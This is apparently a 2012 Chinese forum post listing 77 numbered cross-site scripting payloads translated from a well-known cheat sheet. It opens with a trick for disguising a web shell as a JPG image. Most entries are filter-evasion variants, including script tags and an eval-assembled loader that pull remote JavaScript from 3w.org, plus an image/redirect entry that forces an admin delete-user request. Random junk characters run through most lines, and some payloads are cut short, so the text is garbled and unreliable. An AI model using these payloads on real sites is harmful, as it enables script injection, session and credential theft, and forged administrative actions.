跨站图片shell
( V% ?- J( p! WXSS跨站代码 <script>alert("")</script>
9 D$ G. j7 e+ J8 ~/ z, O$ D( A
) ?5 ?; k p. E1 o* [1 [将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马; T9 y4 J4 M1 {- H& a
$ `( a3 `2 H6 A$ d' J/ q" l! N- ^7 {1 m+ O/ s4 W3 L* u
: w; d1 H6 y- N6 ~
1)普通的XSS JavaScript注入
! c7 q! X6 i& I. |3 D D& K<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 \2 |/ ^# b) V: n" r) j! `* ]3 T. w! M+ j- E& U) r# _4 G `
(2)IMG标签XSS使用JavaScript命令
2 j; p- i+ q" j! a" X0 T7 I' f<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ A' C& s1 Z+ p7 k* |
, m7 S0 m+ b! b1 X0 Q(3)IMG标签无分号无引号
( ]! m2 F; r. q/ z8 N6 P<IMG SRC=javascript:alert(‘XSS’)>
$ m/ ^. x0 `% u/ [ x* y/ {
8 ^2 L# Z! l, g/ v& Z# ~(4)IMG标签大小写不敏感: ?& N4 G5 i( z) p. ^+ S
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
7 Y6 E( l6 ?* O4 `0 C( |+ H/ J+ _
" o: t) P1 Z% ]; c9 b E(5)HTML编码(必须有分号)
4 g9 \, \2 [6 ]1 |+ }<IMG SRC=javascript:alert(“XSS”)>6 k5 Y: R, i6 o& h: ~/ L
4 q. y3 y1 v ?* c3 y4 v(6)修正缺陷IMG标签
" f, D N5 G+ y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 L8 f, N0 a) [
) O' F' p6 k: e
(7)formCharCode标签(计算器)
2 b1 H" E; I \4 B<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 y- E' T* X/ e; P4 h( A& D
! k' K5 K5 p% G! X
(8)UTF-8的Unicode编码(计算器)8 B8 A: U; @' o
<IMG SRC=jav..省略..S')>2 B0 M7 v# I% O& g) e
6 Q- e( ~! H. D& O8 ]4 X
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ _. r0 @) Z. ~" R# M
<IMG SRC=jav..省略..S')>
7 }, v( b7 O4 J! f! R6 F; n/ C6 f3 y7 u$ y0 }) r
(10)十六进制编码也是没有分号(计算器)- J, u7 m9 }& O4 n0 N
<IMG SRC=java..省略..XSS')>8 j/ ^9 J- u' w
; F. U" |4 F0 L; k; a6 A(11)嵌入式标签,将Javascript分开
2 n' u0 E; L. x$ ?0 S+ ~<IMG SRC=”jav ascript:alert(‘XSS’);”>3 `) Z) A6 F* j, Z, Y; o+ r0 A
4 s K' C& X& |(12)嵌入式编码标签,将Javascript分开
3 W' y) {/ ?( u0 p<IMG SRC=”jav ascript:alert(‘XSS’);”>; N( c1 K. x5 p- K
; u- P) @- n- _5 }+ y5 Z# o$ N7 b; d(13)嵌入式换行符
8 H' e+ i# D" B$ A( y<IMG SRC=”jav ascript:alert(‘XSS’);”>0 U% s3 u1 d, G+ V6 b
' k+ {6 u9 [8 X1 i6 d: v(14)嵌入式回车' ? P0 _& I" l6 w' m i; i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( Q& Q/ p# f+ V, Y" h/ _& r- z2 `
(15)嵌入式多行注入JavaScript,这是XSS极端的例子! p, Z/ U9 Q8 H: G
<IMG SRC=”javascript:alert(‘XSS‘)”>/ v6 n/ r. `1 d0 L
# t! f7 V' X; {+ m! k5 m" `(16)解决限制字符(要求同页面), R" [; Q7 N/ o1 H6 x$ k
<script>z=’document.’</script>/ S# x2 P: ?* u3 }
<script>z=z+’write(“‘</script>9 x% j* {4 f7 R4 p7 {
<script>z=z+’<script’</script>- s* Y: F$ N4 z( M0 Z
<script>z=z+’ src=ht’</script>" M# C7 B# K+ V: m1 d
<script>z=z+’tp://ww’</script>
* @0 ]) Z3 h+ S$ z* x<script>z=z+’w.shell’</script>
# ~, U7 e/ ]5 u. m8 z; x0 C<script>z=z+’.net/1.’</script>) V, j' p# t; G/ }8 j t6 c# O R+ c
<script>z=z+’js></sc’</script>
* ~5 O5 o: a: r8 s( w" _<script>z=z+’ript>”)’</script>
9 E, d8 {* Q) G3 Q0 c<script>eval_r(z)</script>3 F* \- p- q! h- _+ V
9 w: N) F& A! g% b$ Z7 n! O(17)空字符2 ?' I/ h8 a; M" T& x2 q j
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 m9 R5 j9 N+ h& ]
5 G' {: @' l& M" P(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; B% j/ k( X7 n' ?1 Eperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out/ G: N; Y7 h5 g& g" b8 ^
' h( a" d/ c% q/ F d(19)Spaces和meta前的IMG标签
* p6 N% \$ {) y: C" t<IMG SRC=” javascript:alert(‘XSS’);”>
5 {# q$ E7 R z9 A! N h4 r1 x4 J' C. Q6 h7 |) g. `/ }
(20)Non-alpha-non-digit XSS( |4 O1 u" P+ J K
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: V* e& F# G& V- r
' R4 R3 y( Y* U(21)Non-alpha-non-digit XSS to 2
- Z; G2 \" y& h9 l; V<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) F0 r; M6 ?. }5 r5 m- N; B1 i$ T1 {( E
(22)Non-alpha-non-digit XSS to 3
4 v% @2 W, S3 h# z, P$ D& U<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, U f/ `0 p3 Q
T/ C! F& r8 C. [+ f1 r) P
(23)双开括号
# d. e h4 o5 B3 y. z2 S& `$ O<<SCRIPT>alert(“XSS”);//<</SCRIPT> A& x6 P, a' c& j0 j& A$ n" g! ^
3 |7 P7 {- L' C+ C. i/ r2 K# z(24)无结束脚本标记(仅火狐等浏览器)
3 [, F' D0 r. I<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ u) _3 a: S0 X$ N" q; y; a" v8 u+ G4 J% X2 }! r
(25)无结束脚本标记25 A9 H6 p, M# h8 T( o5 ]
<SCRIPT SRC=//3w.org/XSS/xss.js>/ ?8 w1 m' Q1 S& c
/ |& f' T( D2 ?; m; v& T( J& H(26)半开的HTML/JavaScript XSS
7 e2 r! V2 R1 b" l<IMG SRC=”javascript:alert(‘XSS’)”2 D: z0 M9 P4 B1 ^. w8 c8 @ q- R
1 q( e' {- `4 R. t- f(27)双开角括号6 P- L( A$ v' q/ D
<iframe src=http://3w.org/XSS.html <1 P& s8 T4 ]; [) H' f
' F% a: q; B4 x# d/ X2 t& s3 u- ]3 _
(28)无单引号 双引号 分号
9 T2 `7 E, u. @* w8 L9 [7 `<SCRIPT>a=/XSS/
: }5 k- h4 D$ e: H% w# Q2 oalert(a.source)</SCRIPT>
, @* }2 b# _: s$ y+ D$ l; ^( S! o3 V
$ c# m" C6 n: l4 H7 M3 U" M(29)换码过滤的JavaScript
+ J. m4 H7 ^* f2 F9 Z7 ^/ I\”;alert(‘XSS’);//6 _( N- z2 A3 y; g, v5 u; J, }
" \) Z! _( K5 {) W, D7 m( G
(30)结束Title标签6 ^ Q5 w# a' r" |; P) b( E
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 L6 l5 x, A5 j3 r2 l! m
2 c1 G W2 d6 _7 }3 u(31)Input Image
* d+ R$ f3 P4 @4 L# d/ |<INPUT SRC=”javascript:alert(‘XSS’);”>* T/ V) r8 B9 Z; l0 U
# V, {2 y# e3 t" K2 W& l(32)BODY Image
0 S/ ^* z$ ]3 U! M0 j8 W<BODY BACKGROUND=”javascript:alert(‘XSS’)”>( l; U$ [" R3 q, Z% z
+ c0 _. A6 k$ c4 _; E(33)BODY标签
, p6 G" O' N* i1 i2 B9 t<BODY(‘XSS’)>
- G8 E+ J) b2 b4 O7 X" Q/ \ @5 b% X0 I o( ]) g- ~
(34)IMG Dynsrc
) l0 N8 d6 i) ~<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 L3 i; N; L- i; ~* ~9 `- O. b9 D% x1 x# [2 g6 L" s. O
(35)IMG Lowsrc( |3 @, S5 T0 n T- r( n
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
, E: w* i( g3 S R8 z
' C6 f# E; N0 V) J* C9 a(36)BGSOUND
+ E) v* K0 f% t<BGSOUND SRC=”javascript:alert(‘XSS’);”>' F" g/ L8 X% x, p3 f$ A: r' C. w0 u
# O4 U+ w* z" g3 `& ^# J
(37)STYLE sheet- @* D; h8 A3 O( a0 c) ?
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- K" W4 Y, ]' {1 [6 X5 u: p
7 P; y) [' Q" t; i(38)远程样式表3 @# p+ m! n) r' ^
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 |1 \* t0 j. {) ~ ~
) {$ m9 ~( @- Q4 }(39)List-style-image(列表式)$ j3 L$ n! E; Q
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* }! ]% G( i" g6 }
4 E& {% y% y. j( v4 q4 S b+ _(40)IMG VBscript$ z( R# v/ E' g8 G D9 }
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( j7 X/ p& d$ n: R: z0 s% w& `9 {* K% s
. ]/ q* E& N6 D F4 n) T1 B(41)META链接url
\2 q- K P2 l9 e. K<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
p0 G- k3 C) u; r0 n
& R4 w% h+ m' b7 u(42)Iframe6 n) s7 s: u4 E, m* V4 M
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 e- ^$ I9 U7 H5 D8 B2 b& [. A7 T(43)Frame7 j) |: e2 `8 c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>8 ~3 v1 `! C9 |, Y7 M# x# u8 X
+ @: i9 j6 x) v; O; t. Y, b
(44)Table$ N7 [. a; y4 ^5 ?' \
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> H: o8 K. m6 G/ r
) F! D1 T# F8 z4 l. z; w* N8 t) p(45)TD2 @1 m: e. M, _( @1 ~8 e& d$ p3 I
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! y/ l" f8 d" A5 x/ S
, {3 h X: \" u6 d6 V9 G
(46)DIV background-image7 H+ h, _) w5 p. V; g$ t9 g
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! V' g3 B; t* C* z7 P+ }% U; m
* b5 D1 u: U6 c+ `
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 N0 |5 ^, }. x7 f
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
2 [" C5 k% u9 a+ g
# n4 o* }, r; W6 p( p(48)DIV expression' G5 F/ Y- ]. Q+ u4 S; J
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' m$ Y+ K) x0 J* t1 R* m; G
3 v# A3 ^: S2 F' P(49)STYLE属性分拆表达
2 i) k7 O7 R, S7 i0 N* z3 s* a<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: J* \6 S9 v1 {& _5 X
: E4 u6 U' H& c9 v(50)匿名STYLE(组成:开角号和一个字母开头) B* `; D2 a$ X! j
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 _" v2 }& k4 b3 Z4 p7 q! U
) T8 X1 r- S7 b: S% i. d
(51)STYLE background-image
& C$ l( k2 o8 l1 k0 `<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>/ e1 \- [0 S. X- U' x9 k
4 T- o) D; q: G* J" r+ G
(52)IMG STYLE方式
* C/ {9 w0 v1 m$ {6 w& X* s1 A' p) | Aexppression(alert(“XSS”))’>
# T: K4 ~# P4 @
; R& X6 T6 j- o) _, }4 x(53)STYLE background
% s |8 X- e2 K1 m% ^, f& T<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# X1 `' h* g+ |" T# r. J# ^! q# ]# V# Z7 _
(54)BASE
0 G' A1 m" a2 e3 y( q<BASE HREF=”javascript:alert(‘XSS’);//”> b1 P6 u. N# M+ v5 d. s) l
0 }. L/ i1 K" Q ~7 ~4 A- X% _- z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& H1 O* l) j1 [7 _8 s1 T' N<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
) T |" \* m5 B/ \
% q: W6 ?3 B. U' B, P, r+ T(56)在flash中使用ActionScrpt可以混进你XSS的代码2 h! O: V$ m5 K b! R# U, {
a=”get”;
2 s% u& s' e1 E# Xb=”URL(\”";0 b2 w. E6 h/ G$ X, c
c=”javascript:”;. t0 P7 t5 |# P* |7 `' d
d=”alert(‘XSS’);\”)”;3 M+ [* ?" c9 \0 J- ]' ~ g
eval_r(a+b+c+d);( K& _4 ^ S9 w/ p( _ U+ G
1 f) u6 V; a1 ^+ G% b& d+ [
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
$ p8 x& q/ n6 b<HTML xmlns:xss>
~3 \' I, R2 J. {7 N<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
`7 I8 h, }- m7 B0 \<xss:xss>XSS</xss:xss>/ z8 m" }8 R' z! u, t
</HTML>
% c: v9 Q& C( l; `' ?
' @4 G7 n1 f, j6 ^- ~(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# o0 p% o k$ }# b7 m<SCRIPT SRC=””></SCRIPT>
1 g: X5 o4 b% X0 K7 O; c
4 r* A& v1 F8 |& g5 E(59)IMG嵌入式命令,可执行任意命令9 l7 G9 z3 i) [( O+ m3 B
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
- T; \1 R' s( ^$ ~
, q! G0 U$ Y8 |2 Q. D7 y(60)IMG嵌入式命令(a.jpg在同服务器)
5 |! I. M# Q, X5 Z) `Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
, F$ R6 q" e7 q1 H+ C
+ b i! Z+ f% L(61)绕符号过滤
' r% E) V- [ ]<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# }# S8 k @8 l0 {1 Z& j5 K+ G9 O4 L! p' A! }; ~
(62)
. |* }: ~5 E4 U1 ~' E' R0 {6 Y<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>' a1 {! D( C0 Q6 p' C
& ]! o& i. w) ~8 m( g: V
(63)
' `; a, E, a; r+ X2 t( ?: x<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ g9 ?3 O9 f# l% [- S/ A, f# H5 w8 u! l
(64)1 O3 w6 R5 {9 K4 g5 J0 i; F( y
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 P: y, R# t6 p2 ^2 J' t% L/ a; c1 x# O4 X; o s9 C
(65)
: f+ { G1 R! p3 H) n<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 _0 L( Y5 m( V6 c$ K8 _) Q
" W) l% U, M% u% G$ L7 s5 q(66)
5 u, N3 @* F) b<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
* F: a8 u! T" W: B2 [5 {
6 b' f% V) a: A" ^4 J7 X6 W; M& W. W" j(67)
! W! H z" R; Q9 R- z0 q<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>* I0 R, ]# l3 Z
$ K6 n) ?8 f; v/ J' p' {(68)URL绕行
& t- I2 W8 N$ k* Q7 L<A HREF=”http://127.0.0.1/”>XSS</A>9 C/ s! a' G+ O6 `; w4 f
4 A( O: s" s/ i; ?. r+ f, v. \2 h
(69)URL编码
& Q" A1 l: C7 ]; Q9 t<A HREF=”http://3w.org”>XSS</A>9 Z3 ` B o" f9 n0 g
$ t! d; L9 m# w q' @8 k* q(70)IP十进制
( [4 a& Q& ]! ?2 A/ a<A HREF=”http://3232235521″>XSS</A>) g! O# |/ Y, R8 g C9 p1 Y
6 Z% T' m/ G* V5 l: H3 B" c- F- o(71)IP十六进制( {+ V4 v- c5 i, }6 G
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
: t5 H/ B" u! }, S/ j6 O3 s2 H2 w9 g- h' |
(72)IP八进制, V" X- t/ N0 {
<A HREF=”http://0300.0250.0000.0001″>XSS</A>' n$ B, s8 w+ O; g0 ]3 v/ w( ~$ ~
+ L; M6 x4 ~# Z6 I; s(73)混合编码
; i/ R5 r7 R' u0 W# m<A HREF=”h4 z9 J, \) W$ P# L, i
tt p://6 6.000146.0×7.147/”">XSS</A>
, A& w! H' f* L2 Y" C
; M6 Q3 Z) Z s2 [, K, }(74)节省[http:]
4 D- j# i2 V! t7 j<A HREF=”//www.google.com/”>XSS</A>/ u/ ?4 T" @8 y
+ b9 [6 A2 u# }2 a/ M# c(75)节省[www]- }. H3 R9 H% f, o- v) }' y- A) X
<A HREF=”http://google.com/”>XSS</A>9 x5 }- Q1 H$ e! n0 d
* v# ~1 Z" ]' ] C% S. t- P(76)绝对点绝对DNS
2 l! A) K& q1 z$ Z" o* l<A HREF=”http://www.google.com./”>XSS</A>0 T* s; B6 g* n
( y4 e: ~. `# Y+ k8 a( v6 x6 `" C
(77)javascript链接- V% r4 h& B. B
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>$ U; w" y& ?& P5 `
|
发表于 2012-9-13 17:04:56
收藏
分享
支持
反对